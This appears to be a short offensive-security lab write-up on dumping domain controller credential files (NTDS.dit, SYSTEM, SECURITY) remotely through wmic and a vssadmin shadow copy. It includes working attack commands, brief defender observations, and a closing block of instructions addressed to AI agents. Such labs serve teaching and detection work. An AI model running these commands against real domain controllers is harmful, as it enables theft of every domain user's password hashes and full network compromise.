# Dumping Domain Controller Hashes via wmic and Vssadmin Shadow Copy This quick labs hows how to dump all user hashes from the DC by creating a shadow copy of the C drive using vssadmin - remotely. This lab assumes the attacker has already gained administratrative access to the domain controller. ## Execution Create a shadow copy of the C drive of the Domain Controller: {% code title="attacker\@victim" %} ```csharp wmic /node:dc01 /user:administrator@offense /password:123456 process call create "cmd /c vssadmin create shadow /for=C: 2>&1" ``` {% endcode %} ![](/files/-LfaP9JMv1K3AOzIQNBc) Copy the NTDS.dit, SYSTEM and SECURITY hives to C:\temp on the DC01: {% code title="attacker\@victim" %} ```csharp wmic /node:dc01 /user:administrator@offense /password:123456 process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit c:\temp\ & copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM c:\temp\ & copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY c:\temp\" ``` {% endcode %} Below shows the above command executed on the attacking machine (right) and the files being dumped to c:\temp on the DC01 on the left: ![](/files/-Lfa_NvNdi0W11EARqKP) Mount the DC01\c$\temp locally in order to retrieve the dumped files: {% code title="attacker\@victim" %} ```csharp net use j: \\dc01\c$\temp /user:administrator 123456; dir j:\ ``` {% endcode %} ![](/files/-Lfa_lAev0lVzTL40dh-) Now, of you go extracting hashes with secretsdump as shown here: {% content-ref url="/pages/-LHwpaPZnf94MyLpTb2z" %} [Dumping Domain Controller Hashes Locally and Remotely](/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration.md) {% endcontent-ref %} ## Observations A quick note for defenders on the proces ancestry: ![](/files/-LfaPCUFMkVICWg5F4zc) and of course commandlines: ![](/files/-LfabW8Rhdez1VI3WLZt) as well as service states: ![](/files/-Lfaavm-6B3pUsOpbfYF) ...and of course the lateral movement piece: ![](/files/-LfahZYptQD0OS_inswZ) ## References --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-domain-controller-hashes-via-wmic-and-shadow-copy-using-vssadmin.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.